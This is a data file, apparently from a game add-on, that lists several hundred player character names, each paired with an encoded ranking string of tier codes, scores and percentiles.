["Qweenlouie"] = "RT:150/55%LB:766/96%LM:961/97%",
["Burntsaber"] = "RT:163/63%LB:775/98%EM:866/93%",
["Llaoda"] = "RM:256/56%",
["Slurve"] = "EB:669/93%LM:889/95%",
["Homeopathy"] = "ET:508/83%LB:739/96%EM:878/92%",
["Saltysnack"] = "UM:392/42%",
["Tunasurprize"] = "UT:268/37%RB:505/66%RM:582/64%",
["Bathing"] = "UB:187/49%",
["Cornaro"] = "CB:138/18%UM:396/42%",
["Shennannigan"] = "CB:81/9%",
["Zend"] = "CB:59/6%RM:530/57%",
["Einkil"] = "CB:70/6%",
["Lucresia"] = "CB:6/5%",
["Zerida"] = "UB:261/33%EM:687/76%",
["Biskit"] = "RT:385/52%RB:473/67%RM:555/65%",
["Bluberryyum"] = "CB:40/4%RM:663/73%",
["Reemarmrtin"] = "UM:318/38%",
["Nbeone"] = "RB:546/72%EM:776/83%",
["How"] = "EM:864/90%",
["Nastradamus"] = "RB:464/70%RM:452/67%",
["Haachiu"] = "CT:31/3%RB:293/54%",
["Sancha"] = "UB:308/39%UM:360/42%",
["Nohomalie"] = "UM:422/48%",
["Fijiwater"] = "SB:792/99%LM:946/97%",
["Ilovepvpness"] = "EB:691/88%EM:802/83%",
["Maleficious"] = "LB:798/98%LM:983/98%",
["Zardudesucks"] = "ET:277/76%EB:696/93%EM:876/92%",
["Hrunka"] = "EB:531/76%EM:787/85%",
["Gonfreecss"] = "EB:744/94%EM:902/92%",
["Sickobowed"] = "RT:225/74%EB:655/84%LM:932/95%",
["Cadaex"] = "CM:199/24%",
["Ivanova"] = "UB:186/45%UM:91/27%",
["Sicarios"] = "LB:780/97%SM:995/99%",
["Wildshot"] = "CT:28/1%CB:196/24%RM:497/52%",
["Ilysm"] = "EB:723/91%RM:630/67%",
["Jeanet"] = "RB:427/63%",
["Seismictoss"] = "RB:453/56%RM:625/67%",
["Pelingil"] = "RT:204/62%EB:684/93%EM:858/92%",
["Chog"] = "RT:172/59%EB:594/76%RM:657/70%",
["Swoleshady"] = "RB:505/67%RM:435/50%",
["Babyragee"] = "CT:90/11%EB:590/78%EM:737/80%",
["Sacrifire"] = "EB:661/85%EM:762/80%",
["Lanius"] = "EB:734/93%EM:898/92%",
["Kcon"] = "RB:495/68%RM:619/69%",
["Educable"] = "UM:305/30%",
["Leviosuhdude"] = "UM:65/25%",
["Thânatòs"] = "EB:658/85%EM:722/75%",
["Packofcrows"] = "LB:738/97%EM:831/93%",
["Rheinhart"] = "RB:532/68%EM:884/91%",
["Crenartine"] = "EM:839/88%",
["Jokersfury"] = "UB:229/29%EM:718/79%",
["Powersocket"] = "CB:114/14%RM:608/67%",
["Belwen"] = "RB:448/59%RM:564/60%",
["Elun"] = "EB:599/87%EM:551/78%",
["Devise"] = "CM:176/18%",
["Freebird"] = "UT:307/40%EB:384/81%RM:564/62%",
["Embellish"] = "CB:67/7%UM:151/40%",
["Coweatsgrass"] = "RB:402/54%EM:796/86%",
["Vvax"] = "EB:675/85%EM:823/85%",
["Streetsweepa"] = "EB:737/93%LM:947/96%",
["Rougeboy"] = "RB:566/72%EM:710/75%",
["Fitzmo"] = "UB:205/25%RM:496/51%",
["Kiritori"] = "UM:124/25%",
["Jìmmybigtime"] = "CM:27/0%",
["Yomammy"] = "EB:612/80%EM:787/82%",
["Seeboo"] = "EM:593/81%",
["Moonlycoo"] = "EM:660/83%",
["Thöros"] = "EB:691/93%LM:965/98%",
["Egiw"] = "UB:114/32%UM:352/37%",
["Btsstan"] = "EB:693/89%EM:789/84%",
["Hunnerz"] = "UB:348/44%RM:543/57%",
["Drewbert"] = "EB:670/84%EM:734/78%",
["Johnnydisc"] = "UB:247/31%UM:306/31%",
["Glob"] = "EB:603/79%EM:856/90%",
["Slaker"] = "EB:676/85%EM:774/81%",
["Dyrot"] = "CM:161/14%",
["Amno"] = "EB:658/89%EM:901/93%",
["Dalko"] = "UM:287/29%",
["Bubbanasty"] = "CB:100/12%CM:107/13%",
["Jorg"] = "CM:133/13%",
["Bastalas"] = "UB:299/39%LM:927/95%",
["Meowchitect"] = "RB:510/68%EM:717/78%",
["Ihealzme"] = "EB:598/83%EM:706/78%",
["Starx"] = "RB:537/71%EM:744/78%",
["Delbaed"] = "EB:718/91%LM:953/97%",
["Ptxrau"] = "CB:144/15%RM:488/70%",
["Hilt"] = "EM:769/81%",
["Shamam"] = "LB:752/97%EM:863/90%",
["Sweetmeatz"] = "RM:581/64%",
["Demm"] = "EB:733/93%EM:832/88%",
["Gbx"] = "CT:71/24%EB:729/92%EM:804/83%",
["Masvidal"] = "EB:716/90%EM:752/79%",
["Rbhunter"] = "EB:748/94%LM:956/96%",
["Toomuchfiber"] = "LB:767/96%LM:963/97%",
["Floozyz"] = "UB:353/45%RM:503/51%",
["Ighoe"] = "EB:628/87%LM:917/96%",
["Deboci"] = "EB:743/94%LM:965/97%",
["Fuhnbags"] = "CM:126/10%",
["Fäbulous"] = "UT:78/30%EB:701/90%EM:827/87%",
["Hamadren"] = "EB:514/80%EM:563/75%",
["Ágwah"] = "EB:639/81%EM:827/85%",
["Cheattle"] = "RB:366/51%EM:856/91%",
["Ihuntyou"] = "EB:658/85%EM:534/85%",
["Whosdeaddy"] = "EB:657/84%EM:815/84%",
["Biubiuboo"] = "RM:208/59%",
["Haruto"] = "SB:807/99%LM:912/96%",
["Iamfeelgood"] = "EB:704/89%EM:770/80%",
["Evilcatk"] = "CM:189/18%",
["Fakabish"] = "UB:218/27%RM:568/62%",
["Vaderz"] = "EB:664/84%EM:817/84%",
["Mindlessness"] = "EB:552/77%EM:756/83%",
["Shamanator"] = "UB:315/42%RM:510/67%",
["Mangudaii"] = "LB:781/97%EM:927/94%",
["Yuzushu"] = "CT:39/12%UB:320/41%RM:186/55%",
["Vulcer"] = "UB:211/47%RM:354/54%",
["Ultaire"] = "UT:103/39%EB:638/83%EM:806/86%",
["Abé"] = "CT:65/21%UB:346/43%RM:487/52%",
["Samka"] = "UT:80/29%UB:366/47%RM:560/58%",
["Tollbooth"] = "RB:281/71%EM:661/82%",
["Girkey"] = "EB:647/83%RM:693/72%",
["Trixtrix"] = "CT:61/20%RB:402/52%UM:367/37%",
["Fanculo"] = "EB:697/90%EM:866/90%",
["Naws"] = "LB:763/96%EM:905/91%",
["Xiaovera"] = "LB:753/95%EM:923/94%",
["Hotmuffin"] = "RB:483/64%RM:631/69%",
["Plow"] = "CM:74/5%",
["Ðp"] = "RB:430/71%EM:860/93%",
["Samwich"] = "UB:357/46%RM:491/54%",
["Bulio"] = "EB:728/91%LM:933/95%",
["Amsi"] = "EB:738/93%EM:905/92%",
["Mcgary"] = "EB:680/86%EM:921/93%",
["Trungx"] = "RB:502/70%EM:728/79%",
["Epicdemic"] = "RB:484/63%RM:342/69%",
["Droopid"] = "EB:573/79%EM:827/88%",
["Ezper"] = "RB:415/52%RM:548/59%",
["Scaphoid"] = "EM:800/84%",
["Huggymonster"] = "EB:563/85%EM:614/82%",
["Kakeka"] = "CM:146/16%",
["Pazoki"] = "RT:414/66%RB:317/56%RM:247/74%",
["Rwagorn"] = "UT:67/26%UB:365/48%RM:350/71%",
["Dizzy"] = "UT:84/29%RB:386/53%EM:454/77%",
["Mubbles"] = "LB:719/95%LM:946/97%",
["Dyrub"] = "EM:870/87%",
["Joens"] = "EB:619/80%RM:496/52%",
["Chromie"] = "UB:344/45%EM:830/84%",
["Lethalsquirt"] = "EB:691/93%LM:923/96%",
["Valkyrie"] = "EB:637/88%RM:594/74%",
["Jocaste"] = "EB:685/87%EM:861/88%",
["Chronickoff"] = "UM:356/35%",
["Jinada"] = "RB:445/59%RM:520/57%",
["Freekandy"] = "CB:96/9%RM:638/70%",
["Lannageyy"] = "EB:644/88%EM:756/83%",
["Thotadin"] = "CT:69/23%RB:322/66%LM:895/95%",
["Annita"] = "EB:691/94%EM:822/94%",
["Bobofcloth"] = "UB:368/49%RM:659/72%",
["Unbecoming"] = "LB:791/98%LM:933/95%",
["Kevìn"] = "RB:521/69%RM:656/72%",
["Lunyx"] = "SB:814/99%SM:1030/99%",
["Drtug"] = "EB:683/87%EM:860/89%",
["Icbm"] = "UT:209/32%RB:530/70%EM:862/90%",
["Jk"] = "EB:645/83%EM:835/86%",
["Voluk"] = "EB:602/82%EM:828/88%",
["Pow"] = "EB:704/90%LM:954/97%",
["Verkon"] = "RB:423/55%RM:558/58%",
["Abw"] = "RM:537/60%",
["Oomanda"] = "UB:235/29%EM:782/85%",
["Oceiros"] = "CM:178/17%",
["Dirkalina"] = "SB:821/99%SM:1003/99%",
["Shshon"] = "EB:741/93%EM:865/89%",
["Swype"] = "EB:718/90%EM:852/87%",
["Maage"] = "UB:361/47%RM:578/64%",
["Himitsuqt"] = "LB:717/95%EM:905/94%",
["Tornasunder"] = "RM:686/73%",
["Spuz"] = "UM:413/44%",
["Boypucci"] = "UM:337/35%",
["Juicylips"] = "UB:195/25%RM:532/57%",
["Chadow"] = "UB:241/31%UM:434/47%",
["Bluntscience"] = "LB:729/96%EM:858/91%",
["Lighthart"] = "EB:701/94%EM:896/94%",
["Ppomo"] = "CB:84/10%RM:231/53%",
["Archintone"] = "UB:253/32%EM:835/90%",
["Surbrawn"] = "RM:619/66%",
["Ktrogue"] = "UB:280/34%RM:670/71%",
["Hektori"] = "CB:159/21%UM:340/36%",
["Intervention"] = "UB:376/48%RM:663/71%",
["Rack"] = "UB:393/47%UM:449/46%",
["Swaginwagon"] = "CB:196/24%UM:407/44%",
["Bigballa"] = "CT:34/10%RB:555/74%EM:702/76%",
["Doomfire"] = "CT:67/23%UM:368/40%",
["Ramuthra"] = "RM:502/55%",
["Shamanasli"] = "UT:89/28%",
["Shocknörris"] = "UB:213/27%UM:204/41%",
["Peepthis"] = "UB:312/39%RM:697/72%",
["Momoprincess"] = "CT:66/24%RB:551/72%EM:714/75%",
["Mcsteamy"] = "UT:70/28%",
["Baksurgeon"] = "RT:158/55%RB:433/58%EM:716/76%",
["Bigsugar"] = "RT:499/64%EB:623/85%EM:773/84%",
["Ezstes"] = "RT:234/72%RM:170/63%",
["Reboner"] = "RT:385/50%EB:631/86%EM:904/94%",
["Wizdiz"] = "CM:27/1%",
["Skull"] = "UT:149/46%EB:635/86%EM:722/89%",
["Bigfatbowner"] = "CT:59/6%",
["Beejohnnie"] = "CT:55/18%EB:640/82%RM:598/62%",
["Regbarclay"] = "UM:418/45%",
["Yurica"] = "EB:703/93%UM:411/44%",
["Respekt"] = "RM:574/63%",
["Sanctiz"] = "EB:603/77%EM:712/75%",
["Kitiana"] = "UM:350/37%",
["Udonotgnome"] = "CB:32/2%UM:409/44%",
["Dozqq"] = "UB:312/42%RM:494/55%",
["Lemmego"] = "CT:46/16%UB:291/39%EM:405/81%",
["Elizbeth"] = "ET:578/77%RB:565/72%RM:628/57%",
["Strellizia"] = "UB:353/47%CM:257/24%",
["Hekazi"] = "UT:99/45%UB:264/35%RM:639/70%",
["Draegar"] = "EB:712/90%EM:714/75%",
["Phaedrus"] = "RT:430/61%EB:712/91%EM:869/91%",
["Takeoutdagat"] = "RB:439/57%RM:644/69%",
["Mysteryman"] = "EB:631/83%EM:826/87%",
["Thrix"] = "EB:595/83%EM:556/75%",
["Lightsoff"] = "UB:24/27%EM:684/75%",
["Hideyobabies"] = "CM:21/3%",
["Astreaus"] = "EB:732/93%EM:863/90%",
["Drevis"] = "EB:551/84%EM:823/92%",
["Derpjohnson"] = "CT:64/12%RB:395/62%CM:28/1%",
["Oliviawild"] = "RB:450/59%EM:815/86%",
["Ssvs"] = "EB:746/94%EM:924/94%",
["Tinder"] = "EB:600/83%EM:759/82%",
["Expunge"] = "EM:799/77%",
["Bsckedy"] = "RB:509/68%EM:868/88%",
["Iolpp"] = "UM:408/44%",
["Kdr"] = "UB:317/41%RM:547/60%",
["Ilus"] = "CM:59/8%",
["Gofu"] = "EB:578/76%EM:855/88%",
["Lilithyn"] = "UM:85/46%",
["Mald"] = "LB:772/97%LM:969/97%",
["Rhokhan"] = "LB:754/95%EM:918/93%",
["Chamber"] = "UB:245/32%UM:147/44%",
["Maximu"] = "RB:397/62%EM:724/86%",
["Banff"] = "RB:561/73%EM:799/83%",
["Kiku"] = "EB:704/93%EM:851/93%",
["Ton"] = "RB:555/74%EM:796/85%",
["Olhagz"] = "EB:686/87%EM:778/81%",
["Làzarús"] = "LB:787/98%LM:957/97%",
["Ohlawd"] = "UM:449/49%",
["Halfcrzy"] = "EB:602/78%EM:739/77%",
["Huntardjr"] = "UM:271/26%",
["Hexalock"] = "UB:314/40%RM:551/57%",
["Snozirp"] = "EB:714/90%EM:809/84%",
["Kisshouten"] = "RB:409/55%RM:497/54%",
["Corndög"] = "RB:406/52%UM:344/35%",
["Tuliasmus"] = "CM:117/10%",
["Chalarine"] = "EB:701/89%LM:951/96%",
["Tsung"] = "EB:626/80%EM:868/89%",
["Heetspurple"] = "EB:698/88%EM:920/93%",
["Youtube"] = "EB:687/88%EM:868/89%",
["Smokeshow"] = "EB:555/79%RM:543/74%",
["Astonishu"] = "EB:716/90%LM:958/97%",
["Insomosaic"] = "EB:641/92%EM:755/92%",
["Auraa"] = "EB:725/91%EM:924/94%",
["Koso"] = "CM:28/1%",
["Tyronus"] = "RB:444/55%UM:437/45%",
["Yonsbow"] = "RB:440/57%RM:504/53%",
["Xenoverse"] = "EB:581/77%EM:847/89%",
["Hightiger"] = "UM:466/48%",
["Vargeese"] = "RB:430/53%EM:728/77%",
["Razac"] = "EB:728/92%EM:882/91%",
["Timtimy"] = "RB:475/64%EM:866/89%",
["Roflcopter"] = "LB:787/98%LM:936/95%",
["Renvari"] = "RB:525/73%EM:811/87%",
["Aedrial"] = "RT:446/61%EB:704/88%EM:845/87%",
["Lionsheart"] = "CB:113/24%UM:155/30%",
["Tiax"] = "CM:171/17%",
["Johnzen"] = "EB:698/89%EM:876/90%",
["Defoz"] = "EB:735/93%LM:949/96%",
["Byk"] = "EB:625/79%EM:810/84%",
["Eyeshadow"] = "EB:698/94%EM:804/87%",
["Murod"] = "EB:644/83%EM:820/85%",
["Ticktacklol"] = "SB:838/99%SM:1062/99%",
["Kørbal"] = "CB:124/15%RM:623/64%",
["Swaglord"] = "EB:752/94%EM:926/94%",
["Rikhu"] = "SB:808/99%LM:979/98%",
["Hyp"] = "CM:56/3%",
["Von"] = "EB:708/94%LM:932/97%",
["Autotune"] = "EM:799/83%",
["Arcane"] = "RB:497/66%RM:577/63%",
["Estrus"] = "EB:697/89%EM:890/91%",
["Laydoff"] = "RB:474/65%RM:503/55%",
["Oneitn"] = "RB:383/50%EM:695/76%",
["Senedra"] = "UM:81/31%",
["Stunbait"] = "EB:605/78%EM:790/82%",
["Frette"] = "UM:422/45%",
["Dænerys"] = "UM:312/31%",
["Firefist"] = "RT:205/70%RB:465/58%RM:633/68%",
["Darce"] = "EB:661/83%EM:885/90%",
["Gizmozis"] = "UM:395/41%",
["Stingray"] = "EB:737/93%LM:972/98%",
["Kimp"] = "CB:202/24%RM:656/70%",
["Truckthat"] = "CM:138/14%",
["Manbearpigz"] = "UM:121/45%",
["Ralphzer"] = "CM:93/7%",
["Titsup"] = "UM:448/46%",
["Trianagle"] = "UM:111/35%",
["Viridiana"] = "CB:167/20%UM:321/33%",
["Ugllybeauty"] = "CB:41/4%CM:130/12%",
["Ezfruitzz"] = "RB:366/70%RM:480/72%",
["Uncledru"] = "EB:595/82%EM:826/88%",
["Clarkchao"] = "EB:625/85%EM:912/94%",
["Sheepsoull"] = "CT:96/12%UB:108/29%UM:273/33%",
["Leothas"] = "RB:527/67%RM:446/66%",
["Periklis"] = "UM:314/31%",
["Chekhov"] = "UM:449/45%",
["Rhonstiné"] = "UM:43/33%",
["Comein"] = "CM:104/15%",
["Magø"] = "CM:143/13%",
["Modwrath"] = "EB:419/76%EM:713/88%",
["Absolutemong"] = "EB:719/92%EM:754/81%",
["Fosthree"] = "RB:482/61%EM:803/90%",
["Kirion"] = "UM:384/39%",
["Oey"] = "CM:168/15%",
["Waterboi"] = "UB:236/30%CM:183/18%",
["Kilahbeez"] = "UB:341/44%RM:606/67%",
["Gstring"] = "UM:253/25%",
["Youbichi"] = "EB:705/89%EM:826/85%",
["Minimao"] = "EB:731/93%EM:823/87%",
["Archtyrn"] = "ET:587/76%EB:655/89%EM:837/89%",
["Shadowfrog"] = "EB:694/87%EM:919/93%",
["Yuexy"] = "CM:131/12%",
["Smallkabe"] = "EB:636/86%EM:708/85%",
["Fmask"] = "CT:60/24%EB:672/85%EM:910/93%",
["Aimin"] = "CM:30/1%",
["Stepbro"] = "CM:58/4%",
["Kvz"] = "EB:643/84%EM:885/92%",
["Emosong"] = "LB:777/97%LM:946/96%",
["Toofattomove"] = "CM:87/8%",
["Insensato"] = "EM:670/82%",
["Ishmaru"] = "RB:361/51%EM:676/86%",
["Dredeye"] = "RB:570/73%RM:566/60%",
["Thesnipur"] = "EB:690/88%EM:875/90%",
["Pukimo"] = "RB:451/62%UM:456/49%",
["Xkay"] = "LB:778/97%LM:935/95%",
["Requiredalt"] = "LB:751/95%EM:834/86%",
["Functiionn"] = "EB:666/85%EM:852/88%",
["Shtalin"] = "SB:800/99%EM:930/93%",
["Metsu"] = "LB:783/98%LM:991/98%",
["Johnytsunámi"] = "SB:815/99%SM:978/99%",
["Grubnit"] = "RT:211/62%RB:323/74%RM:381/63%",
["Treesquidie"] = "RM:592/65%",
["Firebase"] = "RB:515/71%EM:795/86%",
["Thicck"] = "CB:40/2%RM:369/62%",
["Bouris"] = "EB:707/90%EM:788/82%",
["Buttscoot"] = "UB:238/30%RM:625/65%",
["Hallucify"] = "EB:727/91%EM:824/85%",
["Crib"] = "EB:747/94%LM:963/97%",
["Jaik"] = "RB:431/57%LM:959/96%",
["Coldchaos"] = "RB:404/53%RM:501/55%",
["Meriza"] = "EM:783/82%",
["Madara"] = "CB:196/24%RM:493/50%",
["Tahskillz"] = "RT:505/67%RB:448/59%RM:569/61%",
["Sansaa"] = "CB:112/12%UM:381/41%",
["Superopclass"] = "UM:391/42%",
["Callmeac"] = "EB:728/91%LM:940/95%",
["Orcsmashkek"] = "CB:159/17%CM:186/19%",
["Iwillserve"] = "CT:33/7%UB:323/37%EM:720/86%",
["Foulbrewsky"] = "CB:117/14%CM:77/7%",
["Grook"] = "UB:206/26%RM:468/51%",
["Christopoopr"] = "RM:529/58%",
["Autumninpari"] = "RB:564/74%RM:641/68%",
["Snipsnip"] = "EB:699/88%EM:884/90%",
["Munchkin"] = "CB:100/12%CM:33/11%",
["Cheenk"] = "ET:621/81%RB:493/66%EM:734/77%",
["Reak"] = "LB:760/96%EM:839/88%",
["Gerblast"] = "EB:614/80%RM:640/68%",
["Reef"] = "LB:734/96%LM:962/98%",
["Thiccderick"] = "UM:334/35%",
["Davidruid"] = "CB:145/16%CM:223/22%",
["Fathordin"] = "UM:401/43%",
["Soowoop"] = "LB:754/95%LM:939/95%",
["Ellipsyz"] = "LB:788/98%LM:962/97%",
["Kakikaze"] = "EB:669/89%EM:819/91%",
["Tingly"] = "EB:689/87%EM:944/94%",
["Bteam"] = "EM:714/76%",
["Stuglife"] = "EB:695/87%EM:863/89%",
["Caromann"] = "UM:250/25%",
["Pettybone"] = "CM:87/11%",
["Url"] = "UB:402/49%EM:804/90%",
["Realjanky"] = "CB:132/16%UM:439/46%",
["Imbecile"] = "CM:33/2%",
["Natomoo"] = "ET:245/80%EB:582/82%EM:780/89%",
["Sabaton"] = "UB:97/35%RM:461/64%",
["Axehandbilly"] = "CB:176/18%CM:176/18%",
["Aazelyen"] = "CB:135/15%RM:607/67%",
["Rogris"] = "CB:117/12%UM:236/43%",
["Mintberryx"] = "UB:361/46%EM:888/91%",
["Mintie"] = "RB:431/55%EM:790/82%",
["Addvil"] = "EB:685/93%LM:940/97%",
["Wildkat"] = "EB:605/79%EM:758/80%",
["Hanginlow"] = "EB:738/93%EM:841/87%",
["Wraxz"] = "RB:424/55%RM:502/51%",
["Ayaron"] = "CM:30/1%",
["Nightlocky"] = "RM:492/50%",
["Dikdikk"] = "CM:116/12%",
["Reflexs"] = "RB:474/63%EM:685/75%",
["Buffmeplz"] = "EB:575/80%EM:823/89%",
["Smashlol"] = "SB:813/99%SM:1005/99%",
["Rumboltz"] = "RB:463/61%RM:532/58%",
["Letmetankdat"] = "EM:673/83%",
["Benzona"] = "CM:197/20%",
["Buhtters"] = "UM:356/37%",
["Terezino"] = "UB:351/47%RM:662/73%",
["Ethena"] = "RM:506/55%",
["Wacwac"] = "RM:510/54%",
["Nottpally"] = "EB:708/94%EM:893/94%",
["Smushiekins"] = "EB:691/93%LM:929/96%",
["Aingers"] = "LB:770/96%LM:958/97%",
["Marpoletank"] = "EB:586/82%EM:566/76%",
["Alwayscold"] = "EB:559/79%RM:297/71%",
["Warriorharry"] = "EB:661/83%RM:681/73%",
["Suliman"] = "RB:488/67%RM:520/55%",
["Orkurr"] = "CM:176/18%",
["Kanaka"] = "UM:467/49%",
["Dancesondead"] = "RB:482/63%RM:611/63%",
["Krakeonn"] = "RB:518/69%EM:732/79%",
["Weesh"] = "CT:32/8%UB:244/32%CM:164/20%",
["Nurgul"] = "RM:489/50%",
["Bulvine"] = "RB:470/70%EM:631/80%",
["Sumting"] = "CB:144/16%UM:260/26%",
["Thiccy"] = "CB:155/18%RM:579/64%",
["Shekky"] = "EB:631/80%RM:696/74%",
["Nezzle"] = "RB:259/52%EM:710/84%",
["Tokerface"] = "CT:51/12%EB:581/81%EM:856/92%",
["Gapedaddy"] = "UT:201/26%EB:663/84%EM:862/85%",
["Yeyovzla"] = "CM:63/4%",
["Jkjk"] = "LB:771/96%RM:615/66%",
["Zho"] = "UT:216/28%",
["Blackkingbar"] = "CM:33/1%",
["Cactys"] = "RT:270/66%RB:263/66%RM:431/66%",
["Sinkronyzer"] = "UB:118/28%",
["Milkstank"] = "CT:32/12%UB:254/27%UM:365/37%",
["Hugemushroom"] = "UT:155/33%RB:427/65%RM:475/69%",
["Woopazz"] = "CT:150/20%EB:436/78%EM:517/77%",
["Ricco"] = "UT:227/43%EB:704/92%SM:965/99%",
["Fiorian"] = "CT:102/13%UB:366/47%RM:500/52%",
["Cataleptico"] = "UM:395/40%",
["Mysticàl"] = "CT:44/9%CB:136/14%RM:224/55%",
["Pathoran"] = "CT:50/17%UB:195/48%UM:70/26%",
["Reeblin"] = "CT:33/3%CB:190/24%RM:296/61%",
["Twelvegauge"] = "ET:275/82%EB:637/83%EM:544/85%",
["Tenadros"] = "RB:267/60%UM:475/48%",
["Tolletigers"] = "CM:31/2%",
["Krushing"] = "CB:148/15%",
["Flyingcalf"] = "ET:321/90%EB:573/88%EM:827/94%",
["Jackson"] = "UB:171/46%UM:392/46%",
["Cutieqt"] = "RM:378/58%",
["Tuesday"] = "CB:89/10%RM:672/71%",
["Páuse"] = "EM:932/93%",
["Alert"] = "CT:64/7%LB:716/98%LM:959/97%",
["Shifthappens"] = "CT:30/2%EB:703/93%RM:673/74%",
["Icee"] = "RB:440/62%",
["Sparklepuff"] = "UB:254/32%EM:825/84%",
["Cyclopes"] = "LB:782/98%EM:894/93%",
["Lastchance"] = "CB:215/24%UM:278/28%",
["Hodoken"] = "RB:532/71%EM:754/81%",
["Autoshotnoob"] = "EB:649/84%EM:831/86%",
["Homeless"] = "CT:0/1%EB:640/84%EM:721/78%",
["Lolveigar"] = "CB:41/8%RM:563/62%",
["Reclassified"] = "UM:397/41%",
["Oxyy"] = "EM:758/79%",
["Nelm"] = "CB:109/13%CM:68/8%",
["Xaerina"] = "EM:733/77%",
["Xjohnkiller"] = "EB:610/80%EM:867/91%",
["Klauscreate"] = "EB:704/88%EM:723/77%",
["Morphid"] = "RT:223/73%EB:620/86%EM:650/94%",
["Bluewaves"] = "EB:640/86%LM:930/96%",
["Ironpump"] = "RB:500/63%RM:574/61%",
["Spacedockn"] = "EB:426/81%EM:714/75%",
["Nisq"] = "RB:424/55%RM:600/64%",
["Anoladoran"] = "EB:552/77%SM:1010/99%",
["Bigstuff"] = "CB:70/8%RM:531/57%",
["Purplenukes"] = "CB:101/12%UM:368/37%",
["Cinderbunz"] = "CM:53/3%",
["Hikawa"] = "CB:94/9%RM:585/65%",
["Consolation"] = "CM:196/20%",
["Iceybox"] = "CB:49/5%UM:272/28%",
["Tiktock"] = "CM:229/23%",
["Noosle"] = "RM:586/60%",
["Ocb"] = "LB:755/95%LM:953/96%",
["Rbwarrior"] = "EB:696/87%EM:875/93%",
["Tipsy"] = "EB:663/85%EM:887/91%",
["Zizimi"] = "EB:678/91%EM:860/91%",
["Popopo"] = "EB:625/79%RM:688/73%",
["Bearbeque"] = "LM:934/97%",
["Fatbassterd"] = "EB:613/78%EM:759/79%",
["Quikthree"] = "CM:33/1%",
["Nikkeh"] = "EB:736/94%LM:927/96%",
["Maxfrostfire"] = "UM:254/25%",
["Gingshi"] = "CB:194/24%RM:610/65%",
["Twoetoez"] = "UM:439/46%",
["Choof"] = "CB:41/3%UM:388/39%",
["Tvirus"] = "SB:789/99%SM:1030/99%",
["Sinyou"] = "RB:463/58%EM:763/80%",
["Icecreammanx"] = "CT:57/6%UB:254/32%RM:532/58%",
["Hahano"] = "UB:369/44%UM:428/44%",
["Michäel"] = "CB:76/21%CM:181/17%",
["Saucerboi"] = "CM:169/16%",
["Juuicy"] = "CB:119/14%RM:627/69%",
["Yatanana"] = "RB:451/57%RM:562/60%",
["Rancius"] = "LB:772/97%LM:938/95%",
["Angelic"] = "CB:141/16%RM:583/64%",
["Crabmcstab"] = "EB:664/84%RM:676/72%",
["Orced"] = "LB:784/98%LM:972/98%",
["Bansheepie"] = "CM:28/0%",
["Kitmoon"] = "CM:223/21%",
["Jahsiah"] = "UM:79/48%",
["Okdrphil"] = "EB:740/93%EM:812/84%",
["Grõmash"] = "UB:284/31%RM:687/73%",
["Warfreak"] = "EB:637/87%EM:734/86%",
["Savatence"] = "UM:52/43%",
["Grp"] = "UB:291/35%RM:535/57%",
["Draemos"] = "UB:247/26%RM:450/66%",
["Waldonzilber"] = "UM:387/41%",
["Narz"] = "UT:312/40%RB:408/54%UM:425/48%",
["Superflu"] = "UB:392/47%UM:454/47%",
["Maws"] = "RB:550/70%EM:832/86%",
["Pungy"] = "CM:35/4%",
["Buckhorn"] = "RB:492/68%EM:792/85%",
["Sumter"] = "RB:506/67%RM:497/54%",
["Soyman"] = "UB:360/48%RM:485/54%",
["Alahria"] = "RB:387/52%RM:459/50%",
["ßlademaster"] = "CB:176/18%UM:279/28%",
["Dnuoyan"] = "CB:101/10%RM:557/62%",
["Starz"] = "UM:284/29%",
["Mimmzy"] = "UB:85/41%EM:612/79%",
["Stealthbob"] = "RB:490/63%EM:862/88%",
["Warriorz"] = "EB:652/82%EM:892/91%",
["Rustyboltz"] = "UM:335/35%",
["Honanda"] = "UB:359/45%EM:731/77%",
["Perfectdl"] = "CM:103/9%",
["Sted"] = "RM:512/56%",
["Hurryz"] = "RB:213/53%RM:526/59%",
["Maláka"] = "CM:257/24%",
["Farley"] = "CB:163/19%RM:476/52%",
["Phoniex"] = "EB:656/83%EM:864/88%",
["Layy"] = "EB:655/83%LM:931/95%",
["Emmawatson"] = "EB:637/90%EM:749/89%",
["Solè"] = "RB:404/51%RM:520/55%",
["Snowta"] = "UM:407/44%",
["Naausi"] = "EB:620/79%EM:767/80%",
["Aukai"] = "EB:659/83%EM:845/87%",
["Karen"] = "CB:182/22%CM:136/20%",
["Caztrak"] = "EB:723/94%EM:878/92%",
["Veven"] = "CM:185/17%",
["Renri"] = "EB:638/81%EM:923/94%",
["Frogbox"] = "UT:281/37%EB:675/86%EM:924/94%",
["Slnister"] = "RB:563/72%EM:759/79%",
["Araduun"] = "SB:808/99%SM:1026/99%",
["Hedgelord"] = "RB:263/68%RM:272/52%",
["Tocoolforyou"] = "CM:27/0%",
["Huntergather"] = "CB:27/0%CM:141/12%",
["Blood"] = "EB:657/83%LM:946/96%",
["Rainmaker"] = "EB:626/85%EM:905/94%",
["Caened"] = "EB:743/93%EM:905/92%",
["Kooni"] = "CB:54/5%UM:373/40%",
["Elpsycongroo"] = "LB:715/95%EM:877/92%",
["Wuxxr"] = "RB:489/63%EM:763/80%",
["Greenlight"] = "UM:351/37%",
["Zerokelvinn"] = "UM:429/46%",
["Doomcannon"] = "CB:81/9%CM:64/5%",
["Dingø"] = "LB:780/97%LM:978/98%",
["Varriandas"] = "CT:39/2%EB:605/83%EM:766/83%",
["Emera"] = "UT:265/36%LB:727/95%EM:556/79%",
["Jiki"] = "LB:784/98%LM:976/98%",
["Chooger"] = "LB:788/98%SM:1001/99%",
["Frunkis"] = "RM:458/50%",
["Pinhead"] = "CM:156/14%",
["Kaboomz"] = "UB:257/33%EM:850/93%",
["Toenails"] = "EM:771/83%",
["Mangata"] = "CM:95/9%",
["Slayzur"] = "CT:45/13%UM:302/31%",
["Whitewidowz"] = "UB:307/34%RM:533/57%",
["Whatsupman"] = "EB:686/87%EM:846/87%",
["Ticktackadin"] = "EB:569/79%EM:819/88%",
["Yaowy"] = "RB:376/51%EM:731/80%",
["Fjeenzy"] = "EB:686/92%SM:975/99%",
["Tanika"] = "CT:176/20%EB:580/81%EM:874/93%",
["Quesly"] = "EB:738/93%EM:927/94%",
["Kevinlin"] = "EB:673/91%EM:881/93%",
["Oldwangjie"] = "EB:615/88%UM:77/37%",
["Kuonn"] = "UT:226/29%EB:741/93%EM:822/85%",
["Huayeorz"] = "EB:691/87%EM:834/87%",
["Aiyomayah"] = "EB:742/93%EM:876/89%",
["Asunasan"] = "SB:807/99%LM:974/98%",
["Darkdk"] = "RB:332/54%EM:800/92%",
["Gnomygawd"] = "EB:661/85%RM:606/65%",
["Hahakeke"] = "EB:609/83%EM:779/84%",
